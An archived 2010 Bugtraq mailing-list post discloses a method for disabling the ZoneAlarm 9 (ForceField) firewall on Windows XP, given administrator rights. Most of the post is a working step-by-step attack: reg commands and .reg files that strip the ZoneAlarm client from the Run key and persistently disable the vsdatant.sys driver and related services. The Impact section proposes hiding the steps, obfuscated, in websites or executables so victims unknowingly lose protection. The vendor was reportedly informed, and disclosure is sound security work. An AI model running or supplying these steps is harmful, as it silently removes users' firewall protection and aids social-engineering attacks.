lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <083ocoPFV1382S08.1268665581@cmsweb08.cms.usa.net>
Date: Mon, 15 Mar 2010 15:06:21 -0000
From: "Andrew Barkley" <barkley@....net>
To: <bugtraq@...urityfocus.com>
Subject: ZoneAlarm 9 (ForceField) Security Disclosure 

Hi,


This disclosure pertains to ZoneAlarm 9 (ForceField). ZoneAlarm have been
informed. The following discusses similar issues as was previously disclosed
regarding ZoneAlarm 8.


ZoneAlarm 9 (ForceField)
ZoneAlarm version:9.1.007.002
TrueVector version:9.1.007.002
Driver version:9.1.007.002


Introduction
The following illustrates how one can easily disable ZoneAlarm's security for
whatever purposes. When "exploiting" this (administrative privileges are
assumed) and the system rebooted, ZoneAlarm will be disarmed. I've tested this
on various XP platforms successfully. Please let me know your thoughts on
this.


Impact
This particular "vector" opens the door for "exploitation" via social means,
thus unwitting victims may not even realise that their security has been
disabled, leaving them exposed and unprotected. What if the following simple
"proof of concept" was embedded (obfuscated/scripted/automated) within a
website, executable, document etc; and via social means you unsuspectingly
executed it? ZoneAlarm would be disarmed, leaving you exposed and
unprotected.


Preliminaries
Firstly setup a continuous ping or similar to the system being tested, so as
to verify that ZoneAlarm is working and blocking these.


Step-by-step illustration

1) Firstly make a backup copy of the "Run" key (i.e. Runs).

NOTE: This step is actually not required, however, will look less suspicious
in the Task Manager. You could in fact just execute steps (2) and (5) & (6) if
you wish.

i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /s /f



2) Then use the following 'brute-force' method to delete the "Run" key.
ZoneAlarm 'locks' "ZoneAlarm Client" (zclient.exe), which ultimately controls
& depends on "vsdatant.sys".

NOTE: There is a - prepended to [HKEY] this is intentional. You need to create
a registry file (.reg) with the following entries and execute.

NOTE: Creating & executing the following registry file (.reg), may cause
ZoneAlarm to panic, if so you may (or may not) see your ping replies.


*** Registry entries start here ***

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

*** Registry entries end here ***



3) Delete (if exist) the "ZoneAlarm Clients" entries from the backup key
(Runs).

i.e. Command prompt
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ZoneAlarm
Client" /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ISW" /f



4) Restore the backup key (Runs) to the original Key "Run". The whole
objective here really is just to rid the "ZoneAlarm Client" (zclient.exe),
thus "vsdatant.sys" is now vulnerable.

i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s /f



5) Create the following registry keys, or registry file (.reg), execute and
reboot.

NOTE: After rebooting, you may find that any egress traffic that used to
prompt for access, now no longer prompts.


*** Registry entries start here ***

Windows Registry Editor Version 5.00

[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSDATANT\0000]
"CSConfigFlags"=dword:00000001

[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWKL\0000]
"CSConfigFlags"=dword:00000001

[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWSVC\0000]
"CSConfigFlags"=dword:00000001

[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSMON\0000]
"CSConfigFlags"=dword:00000001

*** Registry entries end here ***



6) After and having rebooted in the previous step (5), and now that
"vsdatant.sys" is vulnerable, re-run step (5) again (including reboot).
ZoneAlarm should completely be disarmed and all traffic passing freely.

NOTE: This step may (or may not) be required so as to persistently disable
"vsdatant.sys".


Cheers

Andrew Barkley
(-_-)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ